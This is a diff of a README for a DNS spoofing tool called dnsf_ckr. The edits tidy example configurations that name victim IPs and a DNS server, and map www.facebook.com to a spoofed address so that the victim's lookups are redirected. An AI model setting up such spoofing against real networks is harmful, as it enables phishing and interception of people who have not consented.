ksmaheshkumar/dnsf_ckr/README.md

             sheep: 192.30.70.9
         ;

+        # sheep requests name resolutions in 192.30.70.200 (from now on called "cheap-server")

+        dns-servers =
+            cheap-server: 192.30.70.200
+        ;

-        # and so, the domain that your victim access which you want to spoof, in form <domain>:<spoofed-ip>
+        # and so, the domain that your victim accesses and which you want to spoof, in form <domain>:<spoofed-ip>

-        namelist boring-sites-of-boring-people =
+        namelist boring-sites =
             www.facebook.com: 192.30.70.101
         ;

         # finally, you inform your intentions to dnsf_ckr

         fake-nameserver =
-            with sheep mess up boring-sites-of-boring-people
+            with sheep mess up boring-sites
         ;

+        # but yet we need to describe how valid transactions (in normal conditions, e.g. not spoofed) should be occur.

+        real-dns-transactions =
+            sheep sends requests to cheap-server
+        ;

-Okay, now you want to add a new attack based on a new victim and directing the "sheep" for others wilder domains too:
+Okay, now you want to add a new attack based on a new victim and also direct the "sheep" for others wilder domains:

         victims =
             sheep: 192.30.70.9
             obama: 192.30.70.21
         ;

+        dns-servers =
+            cheap-server: 192.30.70.200
+        ;

-        namelist boring-sites-of-boring-people =
+        namelist boring-sites =
             www.facebook.com: 192.30.70.101
         ;